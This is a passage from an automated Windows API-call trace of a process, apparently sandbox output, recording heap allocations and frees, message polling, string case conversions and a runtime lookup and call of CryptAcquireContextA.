hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0263.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.072] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0263.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.073] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.073] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0263.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0263.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.077] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0263.078] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.078] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0263.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0263.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.080] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0263.081] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.081] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0263.081] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.082] HeapFree (in: 